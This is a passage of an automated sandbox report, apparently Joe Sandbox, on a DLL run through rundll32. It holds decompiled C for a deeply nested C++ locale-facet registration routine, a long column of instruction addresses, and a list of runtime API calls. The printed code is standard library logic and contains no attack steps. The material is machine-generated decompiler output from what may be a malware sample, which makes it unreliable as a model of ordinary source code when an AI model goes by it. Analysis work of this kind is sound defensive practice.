																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6E2066BA(_t946 - 0x14);
																																																																	return E6E220075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6E21162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6E1E1438(_t815);
																																																																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																																			asm("int3");
																																																																			E6E2200AC(0x6e26851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6e26c0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6E21542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6E220075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6E206FD3(__eflags, _t901);
																																																																			 *0x6e26a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6e2c6dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6E206FD3(__eflags, _t900);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6e2c6e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6E206FD3(__eflags, _t899);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6e2c6dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6E206FD3(__eflags, _t898);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6e2c6dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6E206FD3(__eflags, _t897);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6e2c6de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6E206FD3(__eflags, _t896);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6e2c6ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6E206FD3(__eflags, _t895);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6e2c6db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6E206FD3(__eflags, _t894);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6e2c6dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6E206FD3(__eflags, _t893);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6e2c6dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6E206FD3(__eflags, _t892);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6e2c6dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6E206FD3(__eflags, _t891);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6e2c6df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6E206FD3(__eflags, _t890);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6e2c6df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6E206FD3(__eflags, _t889);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6e2c6dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6E206FD3(__eflags, _t888);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6e2c6df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6E206FD3(__eflags, _t887);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6e2c6dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6E206FD3(__eflags, _t886);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6e2c6dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6E206FD3(__eflags, _t885);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6e2c6db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6E206FD3(__eflags, _t884);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6e2c6de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6E206FD3(__eflags, _t883);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6e2c6dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6E206FD3(__eflags, _t882);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6e2c6db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6E206FD3(__eflags, _t881);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6e2c6de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}





































































                          0x6e20ef91
                          0x6e20ef91
                          0x6e20ef98
                          0x6e20efa2
                          0x6e20efa7
                          0x6e20efb2
                          0x6e20efb6
                          0x6e20efb9
                          0x6e20efbe
                          0x6e20efc2
                          0x6e20efc7
                          0x6e20efcb
                          0x6e20f010
                          0x6e20f013
                          0x6e20f01f
                          0x6e20efcd
                          0x6e20efcf
                          0x6e20efd5
                          0x6e20efdb
                          0x6e20efe3
                          0x6e20efe6
                          0x6e20f023
                          0x6e20f031
                          0x6e20f036
                          0x6e20f03e
                          0x6e20f048
                          0x6e20f04d
                          0x6e20f058
                          0x6e20f05c
                          0x6e20f05f
                          0x6e20f064
                          0x6e20f06d
                          0x6e20f06f
                          0x6e20f071
                          0x6e20f0b6
                          0x6e20f0b9
                          0x6e20f0c5
                          0x6e20f073
                          0x6e20f073
                          0x6e20f075
                          0x6e20f07b
                          0x6e20f081
                          0x6e20f089
                          0x6e20f08c
                          0x6e20f0c9
                          0x6e20f0d7
                          0x6e20f0dc
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f113
                          0x6e20f115
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EF98
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EFA2
                          • int.LIBCPMT ref: 6E20EFB9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20EFDC
                          • std::_Facet_Register.LIBCPMT ref: 6E20EFF3
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F013
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F031
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
